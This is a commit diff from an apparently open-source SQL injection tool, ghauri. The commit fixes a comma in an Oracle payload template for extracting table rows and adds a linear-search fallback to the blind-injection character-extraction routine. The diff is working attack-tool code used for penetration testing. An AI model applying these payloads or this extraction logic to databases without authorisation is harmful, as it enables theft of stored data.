Projects STRLCPY ghauri Commits 3c96dbf0
🤬
  • fixed typo in payloads and updated length fetching code to fallback on linear search algo when binary search fails..

  • Loading...
  • r0oth3x49 committed 1 year ago
    3c96dbf0
    1 parent 42add9d6
  • ■ ■ ■ ■
    ghauri/common/payloads.py
    skipped 2061 lines
    2062 2062   "(SELECT TOP 1 {col} FROM {tbl} WHERE 1=1)",
    2063 2063   ],
    2064 2064   "Oracle": [
    2065  - "(SELECT {col} FROM (SELECT {col},ROWNUM AS LIMIT FROM {tbl} {col} ORDER BY ROWNUM) WHERE LIMIT=1)"
     2065 + "(SELECT {col} FROM (SELECT {col},ROWNUM AS LIMIT FROM {tbl} {col} ORDER BY ROWNUM) WHERE LIMIT=1)",
    2066 2066   "(SELECT {col} FROM (SELECT {col},ROWNUM AS LIMIT FROM {tbl}) WHERE LIMIT=1)",
    2067 2067   "(SELECT {col} FROM (SELECT qq.*,ROWNUM AS LIMIT FROM {tbl} qq ORDER BY ROWNUM) WHERE LIMIT=1)",
    2068 2068   ],
    skipped 7 lines
  • ■ ■ ■ ■ ■ ■
    ghauri/core/extract.py
    skipped 1293 lines
    1294 1294   )
    1295 1295   if not is_valid:
    1296 1296   logger.warning(
    1297  - "invalid character detected, retrying."
     1297 + "invalid character detected, retrying.."
    1298 1298   )
    1299  - break
     1299 + retval = self._linear_search(
     1300 + url=url,
     1301 + data=data,
     1302 + vector=vector,
     1303 + parameter=parameter,
     1304 + headers=headers,
     1305 + injection_type=injection_type,
     1306 + proxy=proxy,
     1307 + attack01=attack01,
     1308 + is_multipart=is_multipart,
     1309 + timeout=timeout,
     1310 + match_string=match_string,
     1311 + not_match_string=not_match_string,
     1312 + text_only=text_only,
     1313 + delay=delay,
     1314 + timesec=timesec,
     1315 + suppress_output=suppress_output,
     1316 + expression_payload=value,
     1317 + queryable=entry,
     1318 + chars=chars,
     1319 + offset=pos,
     1320 + list_of_chars="2013456789",
     1321 + vector_type=vector_type,
     1322 + base=base,
     1323 + )
     1324 + if retval:
     1325 + is_valid = self.validate_character(
     1326 + url=url,
     1327 + data=data,
     1328 + vector=vector,
     1329 + parameter=parameter,
     1330 + headers=headers,
     1331 + base=base,
     1332 + injection_type=injection_type,
     1333 + proxy=proxy,
     1334 + is_multipart=is_multipart,
     1335 + timeout=timeout,
     1336 + delay=delay,
     1337 + timesec=timesec,
     1338 + identified_character=retval,
     1339 + vector_type=vector_type,
     1340 + offset=pos,
     1341 + expression_payload=value,
     1342 + queryable=entry,
     1343 + code=code,
     1344 + match_string=match_string,
     1345 + not_match_string=not_match_string,
     1346 + attack01=attack01,
     1347 + )
    1300 1348   if is_valid:
    1301 1349   pos += 1
    1302 1350   chars += retval
    skipped 1053 lines
Please wait...
Page is in error, reload to recover